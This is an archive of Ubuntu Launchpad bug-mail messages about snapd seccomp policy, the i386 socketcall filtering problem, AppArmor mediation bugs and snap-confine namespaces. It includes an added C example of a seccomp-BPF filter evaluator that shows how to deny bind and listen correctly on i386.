Status in snapd package in Ubuntu: Fix Released
Status in snapd source package in Trusty: Fix Released
Status in snapd source package in Xenial: Fix Released
Status in snapd source package in Yakkety: Fix Released

Bug description:
  While debugging a snap I get this security error
  ```
  = Seccomp =
  Time: Sep 22 03:54:47
  Log: auid=4294967295 uid=0 gid=0 ses=4294967295 pid=12869 comm="transmission-da" exe="/snap/transmission/x1/bin/transmission-daemon" sig=31 arch=c03e 179(quotactl) compat=0 ip=0x7fa06ab2d3fa code=0x0
  Syscall: quotactl
  ```
  There is no workaround given, so I've added a security override, but it doesn't do anything.
  ```
  transmission-daemon:
    command: transmission-init start
    stop-command: transmission-init stop
    daemon: forking
    plugs: [network, network-bind, quotactl]
  ...
  plugs:
    quotactl:
      command: binary
      security-override:
        syscalls: [quotactl]
  ```
  There doesn't seem to be a ready-made interface loaded at install time which would include that syscall, so I can't find a solution for that problem.
[Group.of.nepali.translators] [Bug 1661265] Re: [regression] sched_setscheduler denied with Qt/QML applications
** Changed in: snappy
   Status: Fix Committed => Fix Released

** Changed in: canonical-devices-system-image
   Status: In Progress => Fix Released

https://bugs.launchpad.net/bugs/1661265

Title: [regression] sched_setscheduler denied with Qt/QML applications

Status in Canonical System Image: Fix Released
Status in Snappy: Fix Released
Status in snapd package in Ubuntu: Fix Released
Status in snapd source package in Trusty: Fix Released
Status in snapd source package in Xenial: Fix Released
Status in snapd source package in Yakkety: Fix Released
Status in snapd source package in Zesty: Fix Released

Bug description:
  2.22 added stricter mediation of sched_setscheduler which requires use of 'process-control' with certain invocations of sched_setscheduler. Testing and code searches for sched_setscheduler showed that this was not an issue for most applications and existing snaps, but after 2.22 was released it was found that qtbase-opensource-src uses sched_setscheduler indirectly as part of QThread::Priority, and QThread::Priority is used extensively under the hood by the libraries to support (at least) QML applications.

  The fix is simple, adjust interfaces/seccomp/template.go from this:
    sched_setscheduler 0 - -
  back to:
    sched_setscheduler
[Group.of.nepali.translators] [Bug 1576066] Re: 32bit glibc calls old socketcall() syscall, causing seccomp problems
FYI, >=16.10 has libseccomp >= 2.3. xenial has 2.2.3-3ubuntu3 that includes updated syscall tables for this (https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=809556 and https://bugs.launchpad.net/ubuntu/+source/libseccomp/+bug/1554098). >=16.04 have 4.4 kernels and updated glibc.

** Bug watch added: Debian Bug tracker #809556
   http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=809556

** Changed in: libseccomp (Ubuntu)
     Assignee: Jamie Strandboge (jdstrand) => (unassigned)

** Changed in: libseccomp (Ubuntu)
       Status: Confirmed => Fix Released

** Changed in: libseccomp (Ubuntu Xenial)
       Status: New => Fix Released

** Changed in: libseccomp (Ubuntu Trusty)
       Status: New => Triaged

** Changed in: glibc (Ubuntu Trusty)
       Status: New => Triaged

** Changed in: glibc (Ubuntu)
       Status: Confirmed => Fix Released

** Changed in: glibc (Ubuntu Xenial)
       Status: New => Fix Released

https://bugs.launchpad.net/bugs/1576066

Title:
  32bit glibc calls old socketcall() syscall, causing seccomp problems

Status in glibc package in Ubuntu: Fix Released
Status in libseccomp package in Ubuntu: Fix Released
Status in glibc source package in Trusty: Triaged
Status in libseccomp source package in Trusty: Triaged
Status in glibc source package in Xenial: Fix Released
Status in libseccomp source package in Xenial: Fix Released

Bug description:

Back in the day when Linux was created for i386, for who knows what reason, all socket calls were multiplexed through a single syscall API, socketcall(). This was a strange thing to do, but it probably made sense from the standpoint of the same part of the kernel handling all of those calls. It was realised a long time ago that this was a strange and suboptimal arrangement.

By the time they got around to doing amd64 and other architectures, they fixed this arrangement and gave each socket call a separate syscall entry point. 32bit systems continued to do it this old way, however, multiplexing all calls through socketcall().

This is a problem for seccomp. If we want to allow a program to make casual use of the network, but not bind a listener socket, we cannot currently do that. On 64bits we just filter out the bind() and listen() calls, but on 32bit, it's all the same syscall.

The kernel people fixed this problem up last summer by introducing new, separate, syscall entries for each separate call. http://patchwork.sourceware.org/patch/7679/

The problem is that glibc in Y is still using the old socketcall() interface on i386. It needs to be updated to use the new calls.

A possible caveat is that this might create problems for running newer binaries on older kernels on i386 (as we sometimes do with builders) because they won't have the new syscalls. A solution could involve checking for ENOSYS and trying again via the old route.
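Editor's added example (not code from either bug report, nor from snapd, glibc or libseccomp): a minimal classic-BPF evaluator for seccomp filters, run over constructed syscall records, to make the two seccomp points above concrete. First, the 1661265 report's "sched_setscheduler 0 - -" rule is taken here to mean "first argument must be 0, the other two unrestricted" (an assumption about snap-seccomp's argument syntax; the report itself does not spell it out, and it does not say which pid Qt passes, so the non-zero case below simply stands for a wrapper that targets a specific thread). Second, on i386 a filter that denies bind()/listen() by syscall number misses calls routed through socketcall(SYS_BIND, ...), so it has to inspect socketcall's first argument too. Opcode values, SECCOMP_RET_* values, AUDIT_ARCH_* values and syscall numbers are the kernel's x86_64/i386 ones; the host is assumed little-endian (args[0]'s low word sits at offset 16 of seccomp_data), and the filters are hand-written here, not snapd's.

```c
/* Added example: tiny cBPF/seccomp evaluator plus hand-written filters.
 * Assumes a little-endian host (x86). Not snapd's or libseccomp's code. */
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

/* cBPF opcodes and seccomp return values, per the kernel ABI */
#define LD_W_ABS  0x20u              /* BPF_LD  | BPF_W   | BPF_ABS */
#define JEQ_K     0x15u              /* BPF_JMP | BPF_JEQ | BPF_K   */
#define RET_K     0x06u              /* BPF_RET | BPF_K             */
#define RET_ALLOW 0x7fff0000u        /* SECCOMP_RET_ALLOW           */
#define RET_EPERM (0x00050000u | 1)  /* SECCOMP_RET_ERRNO | EPERM   */

#define ARCH_X86_64 0xc000003eu      /* AUDIT_ARCH_X86_64 */
#define ARCH_I386   0x40000003u      /* AUDIT_ARCH_I386   */

/* syscall numbers used below (x86_64 / i386), and socketcall sub-calls */
enum { NR_SCHED_SETSCHEDULER_64 = 144, NR_BIND_64 = 49, NR_LISTEN_64 = 50,
       NR_SOCKETCALL_32 = 102, NR_BIND_32 = 361, NR_LISTEN_32 = 363,
       SYS_BIND_MUX = 2, SYS_LISTEN_MUX = 4 };

struct cbpf_insn { uint16_t code; uint8_t jt, jf; uint32_t k; };
/* same layout as the kernel's struct seccomp_data */
struct sc_record { int32_t nr; uint32_t arch; uint64_t ip; uint64_t args[6]; };
#define OFF_NR   0
#define OFF_ARCH 4
#define OFF_ARG0 16

#define LD(off)      { LD_W_ABS, 0, 0, (off) }
#define JEQ(k, t, f) { JEQ_K, (t), (f), (k) }
#define RET(v)       { RET_K, 0, 0, (v) }
#define N(a) (sizeof(a) / sizeof((a)[0]))

/* Interpret one filter over one syscall record. Only the three instruction
 * kinds used by these filters are implemented; anything else fails closed. */
static uint32_t run_filter(const struct cbpf_insn *f, size_t n,
                           const struct sc_record *d)
{
    uint32_t acc = 0;
    for (size_t pc = 0; pc < n; pc++) {
        switch (f[pc].code) {
        case LD_W_ABS:
            if (f[pc].k + 4 > sizeof *d) return RET_EPERM;
            memcpy(&acc, (const uint8_t *)d + f[pc].k, 4);
            break;
        case JEQ_K:  /* jump target is pc + 1 + jt/jf, as in the kernel */
            pc += (acc == f[pc].k) ? f[pc].jt : f[pc].jf;
            break;
        case RET_K:
            return f[pc].k;
        default:
            return RET_EPERM;
        }
    }
    return RET_EPERM;  /* fell off the end: fail closed */
}

/* "sched_setscheduler 0 - -": pid argument must be 0, everything else allowed */
static const struct cbpf_insn sched_pid0_64[] = {
    LD(OFF_ARCH), JEQ(ARCH_X86_64, 0, 5),               /* wrong arch -> EPERM */
    LD(OFF_NR),   JEQ(NR_SCHED_SETSCHEDULER_64, 0, 2),  /* other nr -> allow */
    LD(OFF_ARG0), JEQ(0, 0, 1),                          /* pid != 0 -> EPERM */
    RET(RET_ALLOW),
    RET(RET_EPERM),
};

/* Naive i386 port of "deny bind/listen": only the dedicated numbers,
 * so socketcall(SYS_BIND, ...) slips through. */
static const struct cbpf_insn deny_bind_listen_32_naive[] = {
    LD(OFF_ARCH), JEQ(ARCH_I386, 0, 4),
    LD(OFF_NR),   JEQ(NR_BIND_32, 2, 0),
                  JEQ(NR_LISTEN_32, 1, 0),
    RET(RET_ALLOW),
    RET(RET_EPERM),
};

/* socketcall-aware version: also look at the multiplexer's first argument */
static const struct cbpf_insn deny_bind_listen_32[] = {
    LD(OFF_ARCH), JEQ(ARCH_I386, 0, 8),
    LD(OFF_NR),   JEQ(NR_BIND_32, 6, 0),
                  JEQ(NR_LISTEN_32, 5, 0),
                  JEQ(NR_SOCKETCALL_32, 0, 3),  /* not socketcall -> allow */
    LD(OFF_ARG0), JEQ(SYS_BIND_MUX, 2, 0),
                  JEQ(SYS_LISTEN_MUX, 1, 0),
    RET(RET_ALLOW),
    RET(RET_EPERM),
};

/* Run a filter over a constructed record; 1 if the call would be allowed. */
static int allowed(const struct cbpf_insn *f, size_t n,
                   uint32_t arch, int32_t nr, uint64_t arg0)
{
    struct sc_record d = { .nr = nr, .arch = arch, .ip = 0, .args = { arg0 } };
    return run_filter(f, n, &d) == RET_ALLOW;
}

int main(void)
{
    printf("x86_64 sched_setscheduler(0):    %s\n", allowed(sched_pid0_64,
           N(sched_pid0_64), ARCH_X86_64, NR_SCHED_SETSCHEDULER_64, 0) ? "allow" : "EPERM");
    printf("x86_64 sched_setscheduler(4242): %s\n", allowed(sched_pid0_64,
           N(sched_pid0_64), ARCH_X86_64, NR_SCHED_SETSCHEDULER_64, 4242) ? "allow" : "EPERM");
    printf("i386 socketcall(SYS_BIND), naive: %s\n", allowed(deny_bind_listen_32_naive,
           N(deny_bind_listen_32_naive), ARCH_I386, NR_SOCKETCALL_32, SYS_BIND_MUX) ? "allow" : "EPERM");
    printf("i386 socketcall(SYS_BIND), aware: %s\n", allowed(deny_bind_listen_32,
           N(deny_bind_listen_32), ARCH_I386, NR_SOCKETCALL_32, SYS_BIND_MUX) ? "allow" : "EPERM");
    return 0;
}
```

The arrays are in the exact encoding the kernel takes via prctl(PR_SET_SECCOMP, SECCOMP_MODE_FILTER, ...), so the same tables can be installed for real; the evaluator is only there so the decision can be inspected without a 32-bit toolchain. Note that a filter on the pid argument can only see the low 32 bits loaded here, and that on i386 the socketcall arguments proper live in user memory behind args[1], which is exactly why a seccomp filter cannot reach the address being bound.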
[Group.of.nepali.translators] [Bug 1613805] Re: [evolution/wip/webkit2] EHTMLEditorView - Restore the selection end mark correctly when processing HTML to plain text
** Changed in: evolution (Ubuntu Artful)
       Status: In Progress => Fix Released

** Changed in: evolution (Ubuntu Artful)
     Assignee: Jamie Strandboge (jdstrand) => (unassigned)

** Changed in: evolution (Ubuntu Xenial)
     Assignee: (unassigned) => Jamie Strandboge (jdstrand)

** Changed in: evolution (Ubuntu Xenial)
       Status: New => In Progress

https://bugs.launchpad.net/bugs/1613805

Title:
  [evolution/wip/webkit2] EHTMLEditorView - Restore the selection end mark correctly when processing HTML to plain text

Status in evolution package in Ubuntu: Fix Released
Status in evolution source package in Xenial: In Progress
Status in evolution source package in Artful: Fix Released

Bug description:

[Impact]
Ubuntu 16.04 evolution users sometimes send emails with ###SELECTION_END### due to a copy/paste error in the EHTMLEditorView code when converting HTML to plain text.

This is fixed in newer Ubuntu releases. The fix is from upstream:
https://mail.gnome.org/archives/commits-list/2016-May/msg06756.html

[Test Case]
TODO

[Regression Potential]
The regression potential is considered low since the change is minimal and obviously correct. In addition I personally used the patch for months (until upgrading to 17.04) and have several users who also use it without issue.

== Original description ==
From https://mail.gnome.org/archives/commits-list/2016-May/msg06756.html:
"EHTMLEditorView - Restore the selection end mark correctly when processing HTML to plain text

Otherwise the ##SELECTON_END## string could be left in the output."

I sometimes see this from people on xenial. Patch is in the commit list, needs a light backport. I will attach a debdiff if it works.
[Group.of.nepali.translators] [Bug 1613805] Re: [evolution/wip/webkit2] EHTMLEditorView - Restore the selection end mark correctly when processing HTML to plain text
** Description changed:

- From https://mail.gnome.org/archives/commits-
- list/2016-May/msg06756.html:
+ [Impact]
+ Ubuntu 16.04 evolution users sometimes send emails with ###SELECTION_END### due to a copy/paste error in the EHTMLEditorView code when converting HTML to plain text.
+ 
+ This is fixed in newer Ubuntu releases. The fix is a from upstream:
+ https://mail.gnome.org/archives/commits-list/2016-May/msg06756.html
+ 
+ [Test Case]
+ TODO
+ 
+ [Regression Potential]
+ The regression potential is considered low since the change is minimal and obviously correct. In addition I personally used the patch for months (until upgrading to 17.04) and have several users how also use it without issue.
+ 
+ 
+ == Original description ==
+ From https://mail.gnome.org/archives/commits-list/2016-May/msg06756.html:
  "EHTMLEditorView - Restore the selection end mark correctly when processing HTML to plain text
  
  Otherwise the ##SELECTON_END## string could be left in the output."
  
  I sometimes see this from people on xenial. Patch is in the commit list needs a light backport. I will attach a debdiff if it works.

** Changed in: evolution (Ubuntu)
       Status: Confirmed => In Progress

** Changed in: evolution (Ubuntu)
     Assignee: (unassigned) => Jamie Strandboge (jdstrand)

** Also affects: evolution (Ubuntu Xenial)
   Importance: Undecided
       Status: New

** Also affects: evolution (Ubuntu Artful)
   Importance: Undecided
     Assignee: Jamie Strandboge (jdstrand)
       Status: In Progress

https://bugs.launchpad.net/bugs/1613805

Title:
  [evolution/wip/webkit2] EHTMLEditorView - Restore the selection end mark correctly when processing HTML to plain text

Status in evolution package in Ubuntu: In Progress
Status in evolution source package in Xenial: New
Status in evolution source package in Artful: In Progress

Bug description:

[Impact]
Ubuntu 16.04 evolution users sometimes send emails with ###SELECTION_END### due to a copy/paste error in the EHTMLEditorView code when converting HTML to plain text.

This is fixed in newer Ubuntu releases. The fix is from upstream:
https://mail.gnome.org/archives/commits-list/2016-May/msg06756.html

[Test Case]
TODO

[Regression Potential]
The regression potential is considered low since the change is minimal and obviously correct. In addition I personally used the patch for months (until upgrading to 17.04) and have several users who also use it without issue.

== Original description ==
From https://mail.gnome.org/archives/commits-list/2016-May/msg06756.html:
"EHTMLEditorView - Restore the selection end mark correctly when processing HTML to plain text

Otherwise the ##SELECTON_END## string could be left in the output."

I sometimes see this from people on xenial. Patch is in the commit list, needs a light backport. I will attach a debdiff if it works.
[Group.of.nepali.translators] [Bug 1626359] Re: Cannot authorise quotactl syscall for Q_GETQUOTA
This bug is getting slurped into changelogs but it is not fixed in master since the fix was reverted due to https://github.com/snapcore/snapd/pull/2810 not being merged yet. Marking all Ubuntu releases as still affected.

** Changed in: snapd (Ubuntu Trusty)
       Status: Fix Released => In Progress

** Changed in: snapd (Ubuntu Xenial)
       Status: Fix Released => In Progress

** Changed in: snapd (Ubuntu Yakkety)
       Status: Fix Released => In Progress

** Changed in: snapd (Ubuntu Trusty)
       Status: In Progress => Triaged

** Changed in: snapd (Ubuntu Xenial)
       Status: In Progress => Triaged

** Changed in: snapd (Ubuntu Yakkety)
       Status: In Progress => Triaged

https://bugs.launchpad.net/bugs/1626359

Title:
  Cannot authorise quotactl syscall for Q_GETQUOTA

Status in Snappy: In Progress
Status in snapd package in Ubuntu: Triaged
Status in snapd source package in Trusty: Triaged
Status in snapd source package in Xenial: Triaged
Status in snapd source package in Yakkety: Triaged

Bug description:

While debugging a snap I get this security error

```
= Seccomp =
Time: Sep 22 03:54:47
Log: auid=4294967295 uid=0 gid=0 ses=4294967295 pid=12869 comm="transmission-da" exe="/snap/transmission/x1/bin/transmission-daemon" sig=31 arch=c03e 179(quotactl) compat=0 ip=0x7fa06ab2d3fa code=0x0
Syscall: quotactl
```

There is no workaround given, so I've added a security override, but it doesn't do anything.

```
transmission-daemon:
  command: transmission-init start
  stop-command: transmission-init stop
  daemon: forking
  plugs: [network, network-bind, quotactl]
...
plugs:
  quotactl:
    command: binary
    security-override:
      syscalls: [quotactl]
```

There doesn't seem to be a ready-made interface loaded at install time which would include that syscall, so I can't find a solution for that problem.
[Group.of.nepali.translators] [Bug 1626359] Re: Cannot authorise quotactl syscall for Q_GETQUOTA
Most of the fix for this landed in 2.23, but the policy changes were reverted until https://github.com/snapcore/snapd/pull/2810 is merged. In other words, this bug is not Fix Committed and there is no need to test that this is fixed.

** Changed in: snapd (Ubuntu Trusty)
       Status: Fix Committed => Triaged

** Changed in: snapd (Ubuntu Xenial)
       Status: Fix Committed => Triaged

** Changed in: snapd (Ubuntu Yakkety)
       Status: Fix Committed => Triaged

** Changed in: snappy
       Status: Fix Committed => In Progress

** Changed in: snapd (Ubuntu)
       Status: Fix Released => Triaged

** Tags removed: verification-needed

https://bugs.launchpad.net/bugs/1626359

Title:
  Cannot authorise quotactl syscall for Q_GETQUOTA

Status in Snappy: In Progress
Status in snapd package in Ubuntu: Triaged
Status in snapd source package in Trusty: Triaged
Status in snapd source package in Xenial: Triaged
Status in snapd source package in Yakkety: Triaged

Bug description:

While debugging a snap I get this security error

```
= Seccomp =
Time: Sep 22 03:54:47
Log: auid=4294967295 uid=0 gid=0 ses=4294967295 pid=12869 comm="transmission-da" exe="/snap/transmission/x1/bin/transmission-daemon" sig=31 arch=c03e 179(quotactl) compat=0 ip=0x7fa06ab2d3fa code=0x0
Syscall: quotactl
```

There is no workaround given, so I've added a security override, but it doesn't do anything.

```
transmission-daemon:
  command: transmission-init start
  stop-command: transmission-init stop
  daemon: forking
  plugs: [network, network-bind, quotactl]
...
plugs:
  quotactl:
    command: binary
    security-override:
      syscalls: [quotactl]
```

There doesn't seem to be a ready-made interface loaded at install time which would include that syscall, so I can't find a solution for that problem.
[Group.of.nepali.translators] [Bug 1658219] Re: flock not mediated by 'k'
4.10.0-8.10-generic has the fix for this bug so marking the zesty task as released.

** Changed in: linux (Ubuntu)
       Status: Incomplete => Fix Released

** Changed in: apparmor
       Status: Triaged => In Progress

** Changed in: apparmor
     Assignee: (unassigned) => John Johansen (jjohansen)

https://bugs.launchpad.net/bugs/1658219

Title:
  flock not mediated by 'k'

Status in AppArmor: In Progress
Status in linux package in Ubuntu: Fix Released
Status in linux source package in Xenial: Fix Committed
Status in linux source package in Yakkety: Fix Committed

Bug description:

$ cat ./apparmor.profile
#include
profile test {
  #include
  /bin/bash ixr,
  /dev/pts/* rw,
  /usr/bin/flock ixr,

  # Not blocked:
  # aa-exec -p test -- flock -w 1 /tmp/test.lock -c true
  /tmp/test.lock rw,
}
$ sudo apparmor_parser -r ./apparmor.profile
$ aa-exec -p test -- flock -w 1 /tmp/test.lock -c true && echo yes
yes
$ ls -l /tmp/test.lock
-rw-rw-r-- 1 jamie jamie 0 Jan 20 15:57 /tmp/test.lock

The flock command uses flock(LOCK_EX) and I expected it to be blocked due to the lack of 'k'.

apparmor userspace 2.10.95-0ubuntu2.5 (xenial) and 4.9.0-12.13-generic kernel on amd64.
[Group.of.nepali.translators] [Bug 1648903] Re: Permission denied and inconsistent behavior in complain mode with 'ip netns list' command
This is fixed with 4.10.0-8.10-generic. Marking zesty task as fixed.

** Changed in: linux (Ubuntu)
       Status: Incomplete => Fix Released

https://bugs.launchpad.net/bugs/1648903

Title:
  Permission denied and inconsistent behavior in complain mode with 'ip netns list' command

Status in AppArmor: New
Status in linux package in Ubuntu: Fix Released
Status in linux source package in Xenial: Fix Committed
Status in linux source package in Yakkety: Fix Committed

Bug description:

On 16.04 with Ubuntu 4.4.0-53.74-generic 4.4.30

With this profile:

#include
profile test (attach_disconnected,complain) {
  #include

  /{,usr/}{,s}bin/ip ixr, # COMMENT OUT THIS RULE TO SEE WEIRDNESS

  capability sys_admin,
  capability net_admin,
  capability sys_ptrace,
  network netlink raw,
  ptrace (trace),

  / r,
  /run/netns/ rw,
  /run/netns/* rw,
  mount options=(rw, rshared) -> /run/netns/,
  mount options=(rw, bind) /run/netns/ -> /run/netns/,
  mount options=(rw, bind) / -> /run/netns/*,
  mount options=(rw, rslave) /,
  mount options=(rw, rslave), # LP: #1648245
  umount /sys/,
  umount /,

  /bin/dash ixr,
}

Everything is fine when I do:

$ sudo apparmor_parser -r /home/jamie/apparmor.profile && sudo aa-exec -p test -- sh -c 'ip netns list'
$

and there are no ALLOWED entries in syslog.

However, if I comment out the '/{,usr/}{,s}bin/ip ixr,' rule, I get a permission denied and a bunch of ALLOWED entries:

$ sudo apparmor_parser -r /home/jamie/apparmor.profile && sudo aa-exec -p test -- sh -c 'ip netns list'
open("/proc/self/ns/net"): Permission denied

Dec  9 17:08:09 sec-xenial-amd64 kernel: [ 3117.862629] audit: type=1400 audit(1481324889.782:469): apparmor="STATUS" operation="profile_replace" profile="unconfined" name="test" pid=4314 comm="apparmor_parser"
Dec  9 17:08:09 sec-xenial-amd64 kernel: [ 3117.870339] audit: type=1400 audit(1481324889.790:470): apparmor="ALLOWED" operation="exec" profile="test" name="/bin/ip" pid=4317 comm="sh" requested_mask="x" denied_mask="x" fsuid=0 ouid=0 target="test//null-/bin/ip"
Dec  9 17:08:09 sec-xenial-amd64 kernel: [ 3117.870559] audit: type=1400 audit(1481324889.790:471): apparmor="ALLOWED" operation="open" profile="test//null-/bin/ip" name="/etc/ld.so.cache" pid=4317 comm="ip" requested_mask="r" denied_mask="r" fsuid=0 ouid=0
Dec  9 17:08:09 sec-xenial-amd64 kernel: [ 3117.870628] audit: type=1400 audit(1481324889.790:472): apparmor="ALLOWED" operation="open" profile="test//null-/bin/ip" name="/lib/x86_64-linux-gnu/libdl-2.23.so" pid=4317 comm="ip" requested_mask="r" denied_mask="r" fsuid=0 ouid=0
Dec  9 17:08:09 sec-xenial-amd64 kernel: [ 3117.870703] audit: type=1400 audit(1481324889.790:473): apparmor="ALLOWED" operation="open" profile="test//null-/bin/ip" name="/lib/x86_64-linux-gnu/libc-2.23.so" pid=4317 comm="ip" requested_mask="r" denied_mask="r" fsuid=0 ouid=0
Dec  9 17:08:09 sec-xenial-amd64 kernel: [ 3117.870861] audit: type=1400 audit(1481324889.790:474): apparmor="ALLOWED" operation="file_mprotect" profile="test//null-/bin/ip" name="/bin/ip" pid=4317 comm="ip" requested_mask="r" denied_mask="r" fsuid=0 ouid=0
Dec  9 17:08:09 sec-xenial-amd64 kernel: [ 3117.870913] audit: type=1400 audit(1481324889.790:475): apparmor="ALLOWED" operation="file_mprotect" profile="test//null-/bin/ip" name="/lib/x86_64-linux-gnu/ld-2.23.so" pid=4317 comm="ip" requested_mask="r" denied_mask="r" fsuid=0 ouid=0
Dec  9 17:08:09 sec-xenial-amd64 kernel: [ 3117.871019] audit: type=1400 audit(1481324889.790:476): apparmor="ALLOWED" operation="create" profile="test//null-/bin/ip" pid=4317 comm="ip" family="netlink" sock_type="raw" protocol=0 requested_mask="create" denied_mask="create"
Dec  9 17:08:09 sec-xenial-amd64 kernel: [ 3117.871066] audit: type=1400 audit(1481324889.790:477): apparmor="ALLOWED" operation="setsockopt" profile="test//null-/bin/ip" pid=4317 comm="ip" family="netlink" sock_type="raw" protocol=0 requested_mask="setopt" denied_mask="setopt"
Dec  9 17:08:09 sec-xenial-amd64 kernel: [ 3117.871099] audit: type=1400 audit(1481324889.790:478): apparmor="ALLOWED" operation="setsockopt" profile="test//null-/bin/ip" pid=4317 comm="ip" family="netlink" sock_type="raw" protocol=0 requested_mask="setopt" denied_mask="setopt"
Dec  9 17:08:09 sec-xenial-amd64 kernel: [ 3117.871128] audit: type=1400 audit(1481324889.790:479): apparmor="ALLOWED" operation="bind" profile="test//null-/bin/ip" pid=4317 comm="ip" family="netlink" sock_type="raw" protocol=0 requested_mask="bind" denied_mask="bind"
Dec  9 17:08:09 sec-xenial-amd64 kernel: [ 3117.871672] audit: type=1400 audit(1481324889.794:480): apparmor="ALLOWED" operation="getsockname" profile="test//null-/bin/ip" pid=4317 comm="ip" family="netlink" sock_typ
[Group.of.nepali.translators] [Bug 1611444] Re: Cannot share a namespace created with 'ip netns' between apps in a devmode SNAP
Marking fix released since 2.20 is available in 16.04 now.

** Changed in: snap-confine (Ubuntu Xenial)
       Status: In Progress => Fix Released

https://bugs.launchpad.net/bugs/1611444

Title:
  Cannot share a namespace created with 'ip netns' between apps in a devmode SNAP

Status in Snappy Launcher: Fix Released
Status in Snappy: Invalid
Status in snap-confine package in Ubuntu: Fix Released
Status in snap-confine source package in Xenial: Fix Released

Bug description:

[Impact]

snap-confine uses linux namespaces (specifically the mount namespace) to give each started snap application process an isolated and unique view of the filesystem. This prevented applications using namespaces through bind mounted files, e.g. using the "ip netns" command as any changes to the namespace would be "locked" in the unique mount namespace of each application process.

Now snap-confine is re-designed to put all applications belonging to a given snap in the same mount namespace. The first started application creates and persists the mount namespace (in a way similar to running the command: unshare -m /path/to/file) and all other processes for all apps in the same snap just join that populated namespace.

For more information about the execution environment, please see this article http://www.zygoon.pl/2016/08/snap-execution-environment.html

[Test Case]

The test case can be found here: https://github.com/snapcore/snap-confine/blob/master/spread-tests/main/mount-ns-sharing/task.yaml

The test case is run automatically for each pull request and for each final release. It can be reproduced manually by executing the shell commands listed in the prepare/execute/restore phases manually. The commands there assume that snapd and snap-confine are installed. No other additional setup is necessary.

Note that this feature affects every application in every snap.

[Regression Potential]

* Regression potential is moderate. This change is large and intrusive and has managed to uncover bugs in the kernel implementation of apparmor (e.g. https://bugs.launchpad.net/apparmor/+bug/1624497). The feature was tested extensively by the upstream developers but still a potential for unexpected breakage is significant.

[Other Info]

* This bug is a part of a major SRU that brings snap-confine in Ubuntu 16.04 in line with the current upstream release 1.0.41.
* snap-confine is technically an integral part of snapd which has an SRU exception and is allowed to introduce new features and take advantage of accelerated procedure. For more information see https://wiki.ubuntu.com/SnapdUpdates

== # Pre-SRU bug description follows # ==

Please see: https://www.mail-archive.com/snapcraft@lists.ubuntu.com/msg00542.html for additional details. It was requested that I move that discussion to this bug report.

In summary it appears that multiple "apps" in a SNAP cannot share the same NETNS namespace. If one app creates a namespace the other apps in the SNAP cannot use it. They get assorted errors like:

RTNETLINK answers: Invalid argument

Please see the details in the mail archive posting.
[Group.of.nepali.translators] [Bug 1630040] [NEW] [SRU] update to 1.0.42
Public bug reported:

TODO...

** Affects: snap-confine (Ubuntu)
   Importance: Undecided
       Status: Fix Released

** Affects: snap-confine (Ubuntu Xenial)
   Importance: Undecided
     Assignee: Zygmunt Krynicki (zyga)
       Status: In Progress

** Affects: snap-confine (Ubuntu Yakkety)
   Importance: Undecided
       Status: Fix Released

** Also affects: snap-confine (Ubuntu Yakkety)
   Importance: Undecided
       Status: New

** Also affects: snap-confine (Ubuntu Xenial)
   Importance: Undecided
       Status: New

** Changed in: snap-confine (Ubuntu Yakkety)
       Status: New => Fix Released

** Changed in: snap-confine (Ubuntu Xenial)
       Status: New => In Progress

** Changed in: snap-confine (Ubuntu Xenial)
     Assignee: (unassigned) => Zygmunt Krynicki (zyga)

https://bugs.launchpad.net/bugs/1630040

Title:
  [SRU] update to 1.0.42

Status in snap-confine package in Ubuntu: Fix Released
Status in snap-confine source package in Xenial: In Progress
Status in snap-confine source package in Yakkety: Fix Released

Bug description:

TODO...
[Group.of.nepali.translators] [Bug 1606277] Re: log-observe interface is broken in latest snap-confine
This was fixed in 1.0.38-0ubuntu0.16.04.3 in xenial.

** Changed in: snap-confine (Ubuntu Xenial)
       Status: Fix Committed => Fix Released

https://bugs.launchpad.net/bugs/1606277

Title:
  log-observe interface is broken in latest snap-confine

Status in Snappy Launcher: Fix Released
Status in snap-confine package in Ubuntu: Fix Released
Status in snap-confine source package in Xenial: Fix Released
Status in snap-confine source package in Yakkety: Fix Released

Bug description:

The log-observe interface is broken due to how we handle bind mounts now. This can be seen with 'snappy-debug':

$ sudo snap install snappy-debug
$ sudo snap connect snappy-debug:log-observe ubuntu-core:log-observe
$ sudo /snap/bin/snappy-debug.security scanlog
kernel.printk_ratelimit = 0
Traceback (most recent call last):
  File "/snap/snappy-debug/22/bin/snappy-security-scanlog", line 580, in
    sys.exit(main())
  File "/snap/snappy-debug/22/bin/snappy-security-scanlog", line 569, in main
    from_end=opt.only_new)
  File "/snap/snappy-debug/22/bin/snappy-security-scanlog", line 92, in __init__
    self.scan_log(log_file, snap_name, follow, from_end)
  File "/snap/snappy-debug/22/bin/snappy-security-scanlog", line 157, in scan_log
    log = open_file_read(log_file)
  File "/snap/snappy-debug/22/bin/snappy-security-scanlog", line 71, in open_file_read
    orig = codecs.open(path, 'r', "UTF-8", errors="replace")
  File "/usr/lib/python3.5/codecs.py", line 895, in open
    file = builtins.open(filename, mode, buffering)
FileNotFoundError: [Errno 2] No such file or directory: '/var/log/syslog'

This is because /var/log/syslog is not available at runtime due to the bind mounts. This can be shown by installing hello-world, adjusting /var/lib/snapd/apparmor/profiles/snap.hello-world.sh to have "/**/ r," (to be able to read any directory), reloading the profile, then doing:

$ hello-world.sh
...
bash-4.3$ ls /var/log/
alternatives.log  btmp   dpkg.log  fsck     watchdog
bootstrap.log     dmesg  faillog   lastlog  wtmp

This may also be a problem with other interfaces, I haven't checked extensively, though it seems that /var/lib/extrausers (from the nameservice abstraction) won't work right, and (at least) ppp (/var/log/ppp) and timezone-control (/usr/share/zoneinfo) are also affected.

WORKAROUND for snappy-debug: launch outside of the launcher:
$ sudo SNAP=/snap/snappy-debug/current PATH=$PATH:/snap/snappy-debug/current/bin /snap/snappy-debug/current/bin/snappy-security scanlog
[Group.of.nepali.translators] [Bug 1584346] Re: Store reports "package contains external symlinks: usr/lib/x86_64-linux-gnu/libmvec.so lint-snap-v2_external_symlinks"
Fixed in upstream 0.44 and in 16.10.

** Also affects: click-reviewers-tools (Ubuntu)
   Importance: Undecided
       Status: New

** Also affects: click-reviewers-tools (Ubuntu Xenial)
   Importance: Undecided
       Status: New

** Also affects: click-reviewers-tools (Ubuntu Yakkety)
   Importance: Undecided
       Status: New

** Changed in: click-reviewers-tools (Ubuntu Yakkety)
       Status: New => Fix Released

** Changed in: click-reviewers-tools
       Status: Fix Committed => Fix Released

https://bugs.launchpad.net/bugs/1584346

Title:
  Store reports "package contains external symlinks: usr/lib/x86_64-linux-gnu/libmvec.so lint-snap-v2_external_symlinks"

